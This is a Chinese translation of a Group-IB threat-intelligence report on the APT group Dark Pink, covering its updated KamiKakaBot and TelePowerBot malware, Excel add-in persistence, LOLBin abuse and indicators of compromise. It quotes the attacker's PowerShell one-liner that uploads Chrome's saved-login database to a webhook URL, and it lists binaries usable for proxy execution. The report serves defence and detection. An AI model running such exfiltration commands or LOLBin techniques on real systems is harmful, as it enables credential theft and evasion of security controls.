1 月初,Group-IB 威胁情报部门发表一份详细的报告,描述了 Group-IB 代号为Dark Pink的新 APT(高级持续威胁)组织使用的技术和工具(也以名称进行跟踪上汽集团). Dark Pink 这个名字是通过形成威胁行为者在数据泄露期间使用的一些电子邮件地址的混合体而创造的。这个威胁行为者自 2021 年年中以来一直在运作,主要在亚太地区。该组织使用一系列复杂的定制工具,依靠鱼叉式网络钓鱼电子邮件部署多个杀伤链。一旦攻击者获得对目标网络的访问权限,他们就会使用高级持久性机制来保持不被发现并保持对受感染系统的控制。
随着我们继续跟踪该组织的活动,我们在 Dark Pink 以前从未针对过的国家/地区发现了新工具、渗透机制和新行业的受害者。
如下面更新的攻击时间表所示,总体而言,Group-IB 的威胁情报确定了该组织针对的13 个组织。我们以前的分析发现了 8 起针对亚太地区实体和 1 个欧洲组织的攻击,其中包括 1 次未成功的攻击。根据最新调查结果,Group-IB 确认了5 名新受害者,这表明攻击的实际范围可能更大。Dark Pink 继续攻击亚太地区的政府、军队和非营利组织,并将其业务扩展到泰国和文莱。另一个受害者是一个教育部门组织,也在比利时被发现。
需要强调的是,自 2023 年初以来, Dark Pink至少进行了两次攻击 。Group-IB 已知的最近一次攻击始于4 月,最新的文件是在5 月检测到的。这意味着该集团没有放缓的迹象。
根据 Group-IB 对网络犯罪的零容忍政策,我们向所有已确认和潜在的受害者发出了主动警告。
在威胁情报收集活动中获得的技术指标表明,Dark Pink 不断更新他们的工具以避开未被发现的防御机制并保持高度活跃。在此博客中,Group-IB 团队分析了 Dark Pink 工具集的最新更新、该组织渗出方法的演变及其杀伤链的修改。该博客深入探讨了 Dark Pink 在该组织最近一次攻击期间观察到的最新 TTP。CISO、企业网络安全团队、事件响应专家、威胁情报专家将找到缓解技术列表以及最新的妥协指标,以更好地保护自己免受 Dark Pink 活动的侵害。
主要发现
-
Group-IB 已经确定了五名新的 Dark Pink 受害者。
-
Dark Pink 将其业务扩展到比利时、文莱和泰国。
-
自 2023 年初以来,该组织仍然非常活跃,成功实施了两次攻击。
-
Group-IB 研究人员发现并分析了Dark Pink在 GitHub 上的新帐户。
-
Dark Pink 利用MS Excel 插件的功能来确保 TelePowerBot 在受感染系统中的持久性。
-
Dark Pink 不断更新其现有工具集以保持不被发现。
-
在最近的一次攻击中,Dark Pink 使用名为 Webhook 的服务通过 HTTP 协议泄露了被盗数据。
-
Dark Pink 很可能使用不同的LOLBin 技术来逃避对受感染机器的检测。
-
KamiKakaBot 的功能分为两个不同的部分:控制设备和窃取敏感数据。
-
除了通过 GitHub 分发有效载荷外,威胁参与者还出于相同目的使用了TextBin.net服务。
Dark Pink 改良型杀伤链
2023 年 5 月 17 日,文件名为“[Update] Counterdraft on the MoU on Rice Trade.zip.iso”已上传到 VirusTotal。此 ISO 映像是 Dark Pink 的典型映像,包含多个项目,包括签名文件、诱饵文档和恶意 DLL。如我们之前的报告所述,感染链对应于最后一个感染链。威胁行为者继续使用MSBuild实用程序在感染链中启动KamiKakaBot (一种旨在通过 Telegram 机器人从威胁行为者控制的 Telegram 频道读取和执行命令的工具)。该组织一直在使用与之前攻击具有相同功能的工具。大多数更改似乎旨在阻碍静态分析。
威胁参与者在 ISO 映像中包含一个MS Word程序。该文件的名称中有一个“.docx”扩展名,并带有 MS Word 图标,以诱使受害者认为打开它是安全的。当通过侧载启动 DLL 文件时,启动下一阶段攻击的 XML 文件将从诱饵文档中解密并保存到受感染的计算机上。XML 文件位于文件末尾。DLL 文件识别最后一个零字节并开始对其进行解密。解密过程会生成一个 XML 文件,该文件将在用户登录系统时由 MSBuild 启动。
在新版本中,KamiKakaBot 的功能分为两个不同的部分:控制设备和窃取敏感数据。和以前一样,KamiKakaBot 直接加载到内存中,而不存储在文件系统中。KamiKakaBot 的主要部分具有相同的逻辑,并且与最初发现的版本没有变化。我们检查了几个不同的样本,在每种情况下,攻击者都添加了混淆以增加静态分析的难度。
在分析 KamiKakaBot 的不同变体时,我们注意到可以用不同的方式实现相同的功能。例如,在我们分析的 KamiKakaBot 版本中上次报告关于该组,最后读取消息的 ID 和 Telegram 令牌存储在注册表项中:
然而,在最新版本中,两者现在都存储在文件中。启动后,将创建一个名为%TEMP%tmpTCD1-10dA-401B-A104.tmp的文件,其中包含字符串 <TG_TOKEN>:<MESSAGE_ID>。每当读取消息或威胁参与者决定更改机器人令牌时,都会更新此文件。重要的是要注意文件名在示例中是硬编码的,并且在每种情况下都可以更改:
下表包含 KamiKakaBot 可以从攻击者那里接收到的命令示例。第三列显示了来自第一个发现的 KamiKakaBot 的命令。第五列列出了最后一个示例中的命令。
在执行 MSBuild 时,会在受感染的系统上创建一个附加模块。它的名称遵循生成为[1-9]{4}-[1-9]{4}-[1-9]{4}-[1-9]{4} 的随机模式。该模块保存在受感染系统的 %TMP% 目录中。在启动 KamiKakaBot.Main 时加载和删除模块。
收集过程自上一版本以来没有改变。它涉及从 Web 浏览器(如 Mozilla Firefox、Google Chrome 和 MS Edge)编译文件列表。然后将每个文件复制到指定的文件夹中。最后,KamiKaka.Main 根据模式[1-9]{6}-[1-9]{5}-[1-9]{5}-[1-]使用随机生成的名称创建 ZIP 存档9]{4}.tmp。对于 Google Chrome 和 MS Edge,解密加密登录名和密码的密钥被提取并添加到存档中。收集到的文件列表如下所示:
持久性和横向移动
在研究我们以前的博文,我们发现在所有攻击中只使用了一个GitHub帐户,这表明 Dark Pink 可能在很长一段时间内未被发现。威胁参与者初始化的恶意软件可以发出命令,让受感染的机器从 GitHub 帐户下载模块。在分析此威胁时,我们在 GitHub ( hXXps://github[.]com/peterlyly )上发现了一个新的 Dark Pink 帐户。第一次提交的日期是 2023 年 1 月 9 日。这一天,关于该组的第一个概念在公共领域可用:
Dark Pink 隐藏了存储库。值得注意的是,当指向存储库中文件的 URL 被上传到 VirusTotal 时,存储库被停用:
Dark Pink 很少在 GitHub 上执行提交。总体而言,在 2023 年 1 月 9 日至 4 月 11 日期间执行了 12 次提交。与之前的攻击一样,它们包含 powershell 脚本、zip 存档和自定义恶意软件。Group-IB 威胁情报已经分析了一些文件,例如ZMsg和Netlua 。ZMsg 工具旨在从即时通讯工具 Zalo 窃取信息。Dark Pink 使用 Netlua 提升权限并启动 powershell 命令。更多细节可以在我们之前的文章中找到博文. zip 存档包含树文件:加密的有效负载、签名的可执行文件和加载程序。
首先,威胁参与者更新用于感染新设备的脚本。然而脚本没有正确更新,很可能是因为仓促,有效载荷是从旧的 GitHub 帐户下载的。为此,文件bbb.gif被上传了两次。此 PowerShell 脚本结合了常见网络资源上的泄露文件和感染文件。
脚本的第一部分对%APPDATA%RoamingMicrosoftWindowsRecent中的文件进行排序目录。Recent 目录包含系统上最后使用的文件的快捷方式,因此脚本首先检索原始文件路径,然后根据最后写入时间和文件扩展名过滤文件。对于满足条件的每个文件,脚本将其复制到临时目录,压缩并通过 Telegram API 将其发送到特定的聊天室。最后,临时文件夹中原始文件的副本将被删除。第二部分检索 SMB 共享列表,从 GitHub 下载 zip 存档,并将其保存到本地目录。然后,脚本不会在存储上创建原始文件,而是创建 LNK 文件,并使用命令从存档中启动恶意可执行文件。新设备的感染机制与之前没有变化:
我们在之前的文章中已经讨论过这部分博客发布有关Dark Pink的帖子。脚本的完整版本可以在附录部分.
正如我们已经注意到的,Dark Pink 使用鱼叉式网络钓鱼来获得初始访问权限,安装自行开发的恶意软件 TelePowerBot 和 KamiKakaBot,这两者都利用 Telegram 机器人的功能与威胁参与者进行通信。通信模块的投放器 (TelePowerDropper/KamiKakaDropper) 被设计为启动一次以在受感染的机器上保留通信模块。这种方式的主要缺点是,如果发现 TelePowerBot 或 KamiKakaBot,攻击者可能会失去控制。为此,威胁行为者开发了一个特殊模块来检查 TelePowerBot 是否已获得持久性。
不是每次打开设备时都检查机器人,而是仅在满足特定条件时才执行检查。该方法并不新鲜,并被广泛讨论。该功能被设计为 Microsoft Excel 加载项库。MS Excel 加载项通过提供自定义函数、宏或工具来扩展其功能。在这种情况下,函数 xlAutoOpen 被覆盖以在每次启动 Excel 时启动恶意活动。在感染期间,威胁行为者执行一个简单的 PowerShell 脚本,将加载项从 GitHub 下载到受感染设备上的Excel 启动目录 ( %APPDATA%MicrosoftExcelXLSTART )。使用简单的 PowerShell 脚本交付 XLL 文件并将其放置在目录中 – 请参阅附录部分.
二进制文件中的所有字符串都使用简单的 XOR 算法加密,但密钥将从与启动过程相关的参数中形成。如果有人试图将此文件上传到沙箱或执行静态分析,这个简单的技巧将有助于避免检测。密钥是根据两个参数计算的。密钥的第一部分是启动进程的名称:excel.exe。密钥的最后一部分是 Excel 中打开文件的扩展名,它应该是.xlsx。如果满足所有条件,字符串将被正确解密。
值得注意的是,旧的 GitHub 帐户中也提供了带有 Excel 插件的相同存档 (hXXps://raw.githubusercontent[.]com/efimovah/abcd/main/ccc.gif)。我们观察到,除了通过 GitHub 分发有效载荷外,威胁行为者还出于相同目的使用了TextBin.net服务。TextBin.net 是一个在线平台,用户可以在其中存储和共享基于文本的信息。
通过简单地更改有效负载的 URL,威胁参与者可以在传递恶意软件时保持匿名。我们确定了两个用于下载 TelePowerBot 的直接链接。这些 TelePowerBot 的变体不包含硬编码令牌。他们从注册表项中检索 Telegram 令牌,这使威胁参与者能够访问和控制机器人的功能。
数据外泄
Dark Pink 使用各种方法和服务来泄露被盗数据。来自窃取者的信息被发送到 zip 存档中的 Telegram 聊天室。过去,我们曾看到过使用电子邮件或公开可用的云服务(如 DropBox)泄露数据。在最近的一次攻击中,Dark Pink 使用名为Webhook 的服务通过 HTTP 协议泄露了被盗数据。Webhook.site 是一项功能强大且用途广泛的服务,允许用户轻松检查、测试和调试 HTTP 请求和 Webhook。使用 webhook.site,可以设置临时端点以捕获和查看传入的 HTTP 请求。威胁行为者使用以下简单命令创建了临时端点并发送了从受害者那里窃取的敏感数据:
$ui='hXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56';$dt=$env:userprofile+'Local SettingsApplication DataGoogleChromeUser DataDefaultWeb Data';(New-Object System.Net.WebClient).UploadFile($ui,$dt);
此外,已经看到 Dark Pink 将 Webhook 服务替换为Windows 服务器。鉴于过去 Dark Pink 通常偏爱公共免费使用服务,这一变化背后的动机尚不清楚。值得注意的是,前面提到的脚本还涉及创建一个新的 WebClient 对象,定义一个文件路径,然后使用 PUT 方法将文件上传到指定的 URL。
上述 Dark Pink 的 Windows 服务器的 IP 地址是 176.10.80[.]38。正如Group-IB 专有的 Graph Network Analysis 工具所示,IP 地址在不同时间点与各种实体有多个连接,包括Meterpreter:
这可能表明,除了他们的自定义工具集之外,Dark Pink 还可能在他们的攻击中使用广泛使用的工具。
侦察
当 Dark Pink 使用非常规方法时,我们已经确定了多个实例,这对于该组织来说并不罕见。例如,在启动TelePowerBot时,他们修改了默认文件关联并使用SyncAppvPublishingServer.vbs来启动 TelePowerBot。关于下载档案的过程,文件是使用ConfigSecurityPolicy 实用程序下载的,它是Windows Defender的一个组件,用于管理设置和促进文件传输。在下载的情况下,可以在位于 %LOCALAPPDATA%MicrosoftWindowsINetCacheIE 的缓存文件夹中找到这些文件。有关示例,请参阅第 36 和 37 行提供的命令。
在侦察阶段,Dark Pink 执行简单的 PowerShell 命令,大概是为了检查是否可以在受感染的设备上找到特定文件。执行的命令如下所示:
gi "C:Program Files (x86)Windows Kits10bin**AccCheckerAccCheckConsole.exe" gi "C:Program Files (x86)Windows Kits10Debuggers*remote. exe"gi "C:Program Files *Internet ExplorerExtexport.exe"gi "C:Program Files*Microsoft Office*MSPUB.exe",gi "C:Program Files*Microsoft OfficeOffice *MSOHTMED.exe"gi "C:Program Filesdotnetdotnet.exe"gi "C:Program FilesWindowsPowerShellModulesPester*binPester.bat"gi "C:Windowsdiagnostics systemWindowsUpdateCL_Invocation.ps1"gi "C:WindowsMicrosoft.NETFramework**ilasm.exe"gi "C:WindowsWinSxSamd64_*Runscripthelper.exe"
尽管尚未发现使用这些工具的具体示例,但根据我们对 Dark Pink 的研究和经验,我们相信所有这些工具都可用于代理执行或下载恶意负载。下表解释了网络罪犯如何在受感染的设备上使用这些工具:
AccCheckConsole.exe 在 AccCheckConsole.exe 的上下文中加载托管 DLL https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/remote.exe 在受信任的 Microsoft 签名二进制文件下执行进程 https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/Extexport.exe 执行 DLL 文件 https://lolbas-project.github.io/lolbas/Binaries/Extexport/MSPUB.exe 从远程服务器下载负载 https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/MSOHTMED.exe 从远程服务器下载负载 https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/dotnet.exe 即使启用了 app locker 也执行任何 DLL https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/Pester.bat 执行代码 https://lolbas-project.github.io/lolbas/Scripts/pester/CL_Invocation.ps1 启动可执行文件 https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ilasm.exe 确保代理执行恶意负载 https://lolbas-project.github.io/lolbas/Binaries/Ilasm/Runscripthelper.exe 执行 PowerShell 脚本 https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/
结论
我们最近对该组织的行动进行的分析发现,Dark Pink 攻击了 13 个组织,其中五个是新的受害者。此外,目标组织的地理分布值得注意。尽管大多数攻击发生在亚太地区,但两家位于欧洲的组织也在受害者名单上,这意味着威胁行为者的地理范围可能比最初想象的要广泛。
2023 年发生了两次攻击这一事实表明 Dark Pink 仍然活跃并对组织构成持续风险。有证据表明,这些攻击背后的网络犯罪分子不断更新其现有工具,以免被发现。
以上所有意味着所有组织都必须时刻保持警惕并采取积极措施保护自己。紧跟最新威胁并定期更新安全工具和措施至关重要。
指标:
[Update] Counterdraft on the MoU on Rice Trade.zip.iso6b7c4ce5419e7cde80856a85559203dca5219d05115cdd6c1598f2e789149c34wwlib.dll8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a~[INDONESIA] COUNTERDRAFT MOU ON RICE TRADE INDONESIA-INDIA 15052023.DOC78ec064bce850d0e0a022cdbb84a6200e62f92e8e575ebbd4a9b764dc1dce771MS Project file54675c16c1fd97227cb41892431e1f9f8b0b153225b5576445d3ba24860dcfd9ccc.gif115a66aba1068be11e549c4194dda5f338684ae37ffbfc9045c0bae488a5acf4AccHelper.xll6d620e86fd37c9b92a0485b0472cb1b8e2b1662fbb298c4057f8d12ad42808b4ANALYS32.xlld23784c30a56f402bb71d116ef8b5bcc8609061be0ecc6d1014686ff4227197fURLs:hXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56hXXps://webhook[.]site/2b733e31-70bb-4777-be4a-41a98f3559bfhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gifhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gifhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/DDDD.gifhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gifhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gifhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gifhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eee.gifhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gifhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/bbb.gifhXXps://textbin[.]net/raw/1tmfbi0bephXXps://textbin[.]net/raw/d7hs6e68oxhXXp://176.10.80[.]38:8843/uploadhXXp://176.10.80[.]38:8843/11.msihXXp://176.10.80[.]38:8843/1.zip
本文翻译自:https://www.group-ib.com/blog/dark-pink-episode-2/
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):APT Dark Pink卷土重来
